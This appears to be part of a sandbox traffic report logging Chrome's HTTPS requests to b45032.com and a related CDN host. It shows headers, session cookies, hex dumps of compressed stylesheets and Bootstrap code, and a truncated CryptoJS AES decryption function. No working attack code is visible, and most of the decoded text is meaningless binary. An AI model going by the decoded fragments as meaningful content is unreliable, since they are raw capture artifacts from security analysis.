                                                      2025-01-12 23:47:41 UTC531INData Raw: 66 75 6e 63 74 69 6f 6e 20 63 72 79 70 74 6f 4a 73 41 65 73 44 65 63 72 79 70 74 28 65 6e 63 72 79 70 74 65 64 2c 20 70 61 73 73 29 20 7b 0a 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 43 72 79 70 74 6f 4a 53 2e 53 48 41 32 35 36 28 70 61 73 73 29 3b 0a 20 20 20 20 76 61 72 20 69 76 41 6e 64 43 69 70 68 65 72 74 65 78 74 20 3d 20 43 72 79 70 74 6f 4a 53 2e 65 6e 63 2e 42 61 73 65 36 34 2e 70 61 72 73 65 28 65 6e 63 72 79 70 74 65 64 29 3b 0a 20 20 20 20 76 61 72 20 69 76 20 3d 20 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2e 63 72 65 61 74 65 28 69 76 41 6e 64 43 69 70 68 65 72 74 65 78 74 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 2c 20 34 29 29 3b 0a 20 20 20 20 76 61 72 20 63 69 70 68 65 72 74 65 78 74 20 3d 20 43 72 79 70 74 6f 4a
                                                      Data Ascii: function cryptoJsAesDecrypt(encrypted, pass) { var key = CryptoJS.SHA256(pass); var ivAndCiphertext = CryptoJS.enc.Base64.parse(encrypted); var iv = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(0, 4)); var ciphertext = CryptoJ


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449747154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC1162OUTGET /plus/plugin/css/to_bootstrap.css?ver=1606790105 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:42 UTC366INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:41 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-2dc4a"
                                                      Content-Encoding: gzip
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      2025-01-12 23:47:42 UTC16018INData Raw: 37 35 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 6b 8f 23 c9 91 20 f8 7d 81 fd 0f 31 55 18 74 b5 a6 c8 4e 32 df 39 68 9d e6 b4 8b 9d 01 46 f3 e1 76 0e 58 a0 d5 37 08 92 c1 24 55 4c 92 22 99 f5 e8 ba db df 7e e6 6e 8f f0 97 b9 7b 30 b3 5a 33 03 a9 5a 52 17 c3 cd dc de 66 fe 1e 9f 76 ff 36 db ed 4e c7 d3 a1 dd 37 5f ff eb 7f 69 9a 1f 7e f3 37 f0 7f bf 69 fe 4f f9 f9 e3 e5 f8 72 7c db bc 5b 9d 4e fb 87 1f 7e 78 ec 4e 02 32 9e ef 9e be b7 cd 7f bf db 7f 39 ac 1f 57 a7 66 7a 31 99 8c e0 7f 6e 9a 7f fd b4 3e 9d ba c3 fb e6 9f b6 f3 b1 6d f5 cf eb 79 b7 3d 76 8b e6 79 bb e8 0e cd 1f fe e9 5f 11 ed d1 e0 5d 9f 56 cf 33 83 f1 87 d3 a7 d9 f1 07 e9 e4 87 d9 66 37 fb e1 a9 3d 02 ae 1f fe f9 9f 7e ff df ff e5 7f fe 77 db e9 0f 44 6f b3 dd 1d 9e da cd fa 97 6e 3c
                                                      Data Ascii: 7517k# }1UtN29hFvX7$UL"~n{0Z3ZRfv6N7_i~7iOr|[N~xN29Wfz1n>my=vy_]V3f7=~wDon<
                                                      2025-01-12 23:47:42 UTC13970INData Raw: 67 97 27 92 a8 b9 5e fa 6a 8c 59 e2 9e be 49 cc 22 c1 09 60 9c 15 cc e8 dd 6d 86 53 3b a5 c6 d8 ca bc a2 90 b7 28 fb dd 6b 4c 7f b1 6c 78 73 04 23 1c 4a a4 0d e9 b4 db 6d 20 b8 a2 b7 f8 60 ca ac a6 9d c1 64 30 9d 4a b7 45 8e 75 69 67 a7 3f 5d 26 6a fc 80 a1 73 1e e8 b7 a9 a1 05 b0 45 d4 78 b2 c9 89 06 ed 83 3c 0d ee 96 79 f7 b0 5c 1f 60 1c 3e 5f ad 37 8b ef 1f ec 2f 9b d6 ff a1 0f be 78 d3 07 5d 67 ca 53 30 34 fd 9e ae 56 c4 cd d9 b9 9c ee 12 6a 1d 8e e4 1c 92 21 7f 61 05 27 a3 f7 44 fa 4d b4 48 1b a9 27 d2 5e 76 48 98 c3 ee f7 39 ef 02 8d 48 a2 45 29 c7 f0 28 af be 6a b0 19 2b cb 82 c9 88 5e 83 32 07 43 6d dc e5 1e 61 63 c2 23 1d 91 31 78 0c f1 32 4e 9d 09 50 57 8e 78 b5 4e 1e 7a 95 14 14 20 b6 ea fa 44 12 6d a0 2a 8f 8f 6f 67 5c c4 73 cf 4f 2c 69 d5 cb
                                                      Data Ascii: g'^jYI"`mS;(kLlxs#Jm `d0JEuig?]&jsEx<y\`>_7/x]gS04Vj!a'DMH'^vH9HE)(j+^2Cmac#1x2NPWxNz Dm*og\sO,i


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449746154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC1147OUTGET /plus/plugin/js/bootstrap.min.js?ver=1606790105 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
                                                      2025-01-12 23:47:42 UTC416INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:41 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 37045
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-90b5"
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:42 UTC15968INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e 2e 6a 71 75 65 72
                                                      Data Ascii: /*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquer
                                                      2025-01-12 23:47:42 UTC16384INData Raw: 28 22 69 6e 22 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 75 70 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2c 74 68 69 73 2e 24 64 69 61 6c 6f 67 2e 6f 66 66 28 22 6d 6f 75 73 65 64 6f 77 6e 2e 64 69 73 6d 69 73 73 2e 62 73 2e 6d 6f 64 61 6c 22 29 2c 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 66 61 64 65 22 29 3f 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 68 69 64 65 4d 6f 64 61 6c 2c 74 68 69 73 29 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64
                                                      Data Ascii: ("in").off("click.dismiss.bs.modal").off("mouseup.dismiss.bs.modal"),this.$dialog.off("mousedown.dismiss.bs.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one("bsTransitionEnd",a.proxy(this.hideModal,this)).emulateTransitionEnd
                                                      2025-01-12 23:47:42 UTC4693INData Raw: 65 73 74 28 22 6c 69 2e 64 72 6f 70 64 6f 77 6e 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 64 2e 74 72 69 67 67 65 72 28 22 61 63 74 69 76 61 74 65 2e 62 73 2e 73 63 72 6f 6c 6c 73 70 79 22 29 7d 2c 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 29 2e 70 61 72 65 6e 74 73 55 6e 74 69 6c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 74 61 72 67 65 74 2c 22 2e 61 63 74 69 76 65 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 3b 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 3d 63 2c 61 2e 66 6e 2e 73 63 72 6f 6c 6c 73 70 79 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 62 2c
                                                      Data Ascii: est("li.dropdown").addClass("active")),d.trigger("activate.bs.scrollspy")},b.prototype.clear=function(){a(this.selector).parentsUntil(this.options.target,".active").removeClass("active")};var d=a.fn.scrollspy;a.fn.scrollspy=c,a.fn.scrollspy.Constructor=b,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.44975320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC571OUTGET /plus/plugin/css/sweetalert.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-59ad"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      2025-01-12 23:47:42 UTC3806INData Raw: 31 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 1c 6b 93 db b6 f1 bb 7f 05 1a 4f c6 e7 cc 51 d6 f3 1e 6a 93 89 63 c7 ad 67 9a a6 33 f1 4c d3 49 fb 81 12 a9 13 6b 8a 54 49 9e cf 8e a7 fd ed dd 05 76 f1 20 00 89 3a 3b e9 2b b9 26 bd 03 81 c5 be 77 b1 5c 70 55 67 ef 46 6d 57 ef 93 76 dd d4 65 59 54 37 e2 fd 03 21 b6 79 71 b3 ed 96 62 32 1e 7f fa 6b f8 bb 7e 93 37 9b b2 be 5b 8a 6d 91 65 79 f5 6b f1 8f 07 0f 46 ed 5d 9e 77 09 3e 2b d3 77 72 dd 2a 5d bf be 69 ea db 2a 4b d6 75 59 37 4b b1 2a 61 08 41 3c f9 4c bc fc fa 4a 7c f6 04 7e 4f 76 6d b2 29 ca 2e 87 09 9f ec 9b fa a6 c8 96 cf bf 7f b9 4b 6f f2 57 4d 5a b5 9b ba d9 8d be 29 00 a5 b6 de 74 a3 a7 e5 7e 9b 9e 7d bb 4f d7 45 f7 ee f3 f9 f8 f1 27 7d 80 fe be cd cd 2a 3d 1b 9f 0b fa df 68 fe 18 d7 ec eb b6
                                                      Data Ascii: 121akOQjcg3LIkTIv :;+&w\pUgFmWveYT7!yqb2k~7[meykF]w>+wr*]i*KuY7K*aA<LJ|~Ovm).KoWMZ)t~}OE'}*=h
                                                      2025-01-12 23:47:42 UTC841INData Raw: f5 d5 1b 68 2e 81 5f e1 fd 26 40 79 b5 cd 05 36 4a b6 f2 71 05 0d a8 94 31 65 23 3d a3 68 61 5d 09 f3 60 12 7c 3f 05 df 90 c2 85 f7 f2 9d d8 e5 cd 4d 9e 81 d5 74 b5 50 df 02 92 1f 5d 19 ed 8a 6a f4 37 dc 15 be 04 74 b3 15 bf bd 2d f7 04 4c 26 19 72 43 1c 88 be 33 ce 31 1f 75 df 7f 73 fb 36 de 19 f4 f2 cd 33 f5 76 5d fc 45 5e e6 39 05 ae ac 39 48 95 08 03 a6 23 2b 43 06 8e 51 e9 ef 38 11 dc 95 f0 1e 34 c9 f5 89 12 7f 75 eb e5 18 c6 0c 04 5b 1a b8 17 80 5b 1b c2 18 0f 64 45 08 70 c9 e5 a4 30 64 8f 17 bf c2 77 e6 bf 07 b3 12 4f ef 72 a9 77 6f 20 e9 19 8d c5 d9 b6 eb f6 cb 27 4f 6e 8a 6e 7b bb 1a 65 a0 53 79 b9 4e 9b 0c be e7 34 02 9d 7d 82 b6 98 a4 6a d1 93 c7 08 e6 59 bd 7f a7 84 31 1d 4f 16 e2 b9 5c 22 9e a9 35 e2 37 5f aa 01 fa fb 0b b9 71 01 af fa 5b d0
                                                      Data Ascii: h._&@y6Jq1e#=ha]`|?MtP]j7t-L&rC31us63v]E^99H#+CQ84u[[dEp0dwOrwo 'Onn{eSyN4}jY1O\"57_q[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.44975420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC577OUTGET /plus/plugin/css/font-awesome.min.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-7187"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      2025-01-12 23:47:42 UTC3806INData Raw: 31 64 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5d 4d 8f dc 48 72 bd ef af 28 cf 60 2d 69 21 f6 14 d9 df 2d ac 3d 6b 1b 0b 0c 30 0b 1f 76 0f 3e f8 92 24 93 55 54 b3 48 8a 1f 5d 5d 12 f4 df fd 32 f9 82 45 4a 91 e5 31 30 07 2f 06 58 35 19 cc cf 97 11 91 11 2f b3 7e fa d3 3f fd 61 f3 a7 cd e6 af 4d 3d 6c fe 72 b4 7d 73 b0 9b 9b ab bb ab eb 4d 7a da fc 9c 9b 17 bb 33 75 7e da 44 9b fd 30 b4 4f 3f fd 54 40 d2 4c 82 57 65 83 e7 3f 2f 9e f8 b2 7e 2d 33 5b f7 36 f4 c9 4f 15 df bf 75 95 3e 6d fe fe cb af 9b ff fc eb af 9b f8 2a 7e bf f9 f7 bf ff fd 69 f3 b7 5f fe b1 61 21 ef 50 e2 4f be 86 a8 30 99 fd e2 ea c2 bf 0e 65 75 7a 7a e3 be 67 9b df 7c e8 bb ec 69 ec aa b7 6f ae ae 7c 1b fb 65 4b a3 a3 4d dd a7 57 b6 19 fe f5 e5 cf be 83 6f de fd 1f be f9 b1 b4 45 f9
                                                      Data Ascii: 1d46]MHr(`-i!-=k0v>$UTH]]2EJ10/X5/~?aM=lr}sMz3u~D0O?T@LWe?/~-3[6Ou>m*~i_a!PO0euzzg|io|eKMWoE
                                                      2025-01-12 23:47:42 UTC3701INData Raw: b2 ed cb 3e 92 3d cb 0a 72 c2 6f 99 a5 b4 4c 14 ce 33 4d 1e 16 82 bc 61 df 2e 16 a6 cb 82 33 a8 75 51 58 2d 38 da 15 00 d1 8d 80 c8 91 4b 2f 55 48 28 4d 34 86 0b b1 fc 58 38 2d 95 c5 16 53 4f fb c4 37 e2 06 79 99 10 06 6e ce 90 01 f9 33 e8 c1 c6 37 d4 43 b0 cb 20 20 5d 12 24 66 b0 f6 ce 79 98 4b f2 c4 90 cf d4 5f 92 23 92 b0 a9 c5 ce 51 8b 56 c4 37 62 1e 9b 9d 8b ee 2c ba 3c 69 75 1f 7e 91 61 5d be 5e 41 48 d8 30 c3 54 ca bc d2 b4 32 e6 97 eb 12 a8 cb 58 c2 72 6d 6b 85 2c df af cb 21 4c ed 38 e7 1c fd f7 f8 5b 03 a2 b0 6a 76 a9 6a 13 85 4b 93 37 d8 98 4b 01 be bc b1 57 bd 0d 61 d5 74 30 3d b2 13 f3 f2 65 2d 9f af 9b 2b 9a b0 5e b9 03 dd 41 32 38 fe e3 d3 6c 52 fd 9f 1f e7 20 ee ba 2c aa c9 ce ed 94 d8 59 2f 8f 98 e5 b7 4f d4 0c 51 7c 4b f8 1f d7 41 d7 e7
                                                      Data Ascii: >=roL3Ma.3uQX-8K/UH(M4X8-SO7yn37C ]$fyK_#QV7b,<iu~a]^AH0T2Xrmk,!L8[jvjK7KWat0=e-+^A28lR ,Y/OQ|KA


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.44975120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC573OUTGET /plus/css/common/bet365_style.css?ver=1684314915 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Wed, 17 May 2023 09:15:15 GMT
                                                      ETag: W/"64649b23-3e1e"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      2025-01-12 23:47:42 UTC3806INData Raw: 31 30 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 5b dd 6e 1b c7 15 be f7 53 6c 45 04 b6 03 2d 45 52 14 25 d1 80 d1 da b1 e2 00 76 5a d8 6e 83 02 05 84 25 b9 24 b7 5a ee b2 bb 4b cb b2 9a cb 5e f5 aa e8 65 df 21 7d 80 22 7d 9a 06 68 de a2 e7 cc f9 99 99 fd b1 e9 34 80 c2 04 11 67 67 67 ce cf 77 7e 67 f8 cb f9 3a 2a ca b8 0a 0e 76 d5 32 3c 3b 78 74 6f 96 2f 6e 6e ef 05 41 b0 cc b3 2a 2c 93 f7 f1 34 18 8e b6 ef 1e e1 58 b0 89 8a 55 92 4d 83 81 0c cc a2 f9 d5 aa c8 77 d9 62 1a f4 46 27 f8 e1 99 49 16 5e 27 8b 6a 0d af 0f 07 3a df ac ba 8c 36 49 7a 33 0d 0e 7e f8 f7 77 ff fd fe 9f 3f fe e3 2f 3f fe eb 6f 07 87 c1 c1 cb 64 5e e4 65 be ac 82 df 47 cf e3 04 87 7e f8 ee af ff f9 fe ef 40 d8 b7 f7 76 e9 61 9a 18 da 82 6d b4 58 24 d9 ca 21 a4 41 59 9a 94 40 7f 75
                                                      Data Ascii: 1097[nSlE-ER%vZn%$ZK^e!}"}h4gggw~g:*v2<;xto/nnA*,4XUMwbF'I^'j:6Iz3~w?/?od^eG~@vamX$!AY@u
                                                      2025-01-12 23:47:42 UTC454INData Raw: f0 10 27 7f 0a ad 3c f7 f6 ae 84 49 cc 0d d1 63 20 eb 35 ce fb e0 94 2e 4c 4c c7 eb 01 25 51 e6 be 17 d0 89 b8 83 50 58 08 45 fd b1 a5 02 f8 51 93 bf 9c db 05 69 be 4d 54 20 0b da e2 f1 e8 b0 fe 5d 86 c5 a4 87 7c e4 58 67 cd 5b f1 31 30 7a d8 e0 de 9f 82 dd 09 22 b9 4d e6 28 82 6b a8 8b cd e5 19 73 95 4e fb c6 aa b8 47 46 b3 e2 a8 d0 bb d1 88 67 0d 76 58 ac a1 91 ad 08 52 fa 4b a3 1b d8 12 5b 88 44 db cf 05 53 e4 47 28 ed 90 a0 82 e3 85 73 34 c8 e2 87 73 17 b0 ea 8f 20 81 de f3 3a 99 41 4f b8 45 02 44 97 84 0d 2c ae 82 0f 21 8b d7 9b d2 7d 5a 92 07 e0 16 21 03 d7 69 ff 7c 40 d2 96 45 8d c7 dc 7b cd 34 82 df 4f 9a 93 b3 f6 d5 61 f1 26 6a 55 42 af f3 79 12 d5 8f d8 6c 96 a7 08 71 0c 9b 1d c0 e8 5c bd a3 10 4e c5 5c 87 c5 a2 fe df e0 6d 59 e9 a4 a9 d7 6f 36
                                                      Data Ascii: '<Ic 5.LL%QPXEQiMT ]|Xg[10z"M(ksNGFgvXRK[DSG(s4s :AOED,!}Z!i|@E{4Oa&jUBylq\N\mYo6


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.44975220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:41 UTC574OUTGET /plus/plugin/css/jquery-ui.min.css?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:42 UTC290INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:42 GMT
                                                      Content-Type: text/css
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: W/"5fc5abd9-7d4c"
                                                      Access-Control-Allow-Origin: *
                                                      Content-Encoding: gzip
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
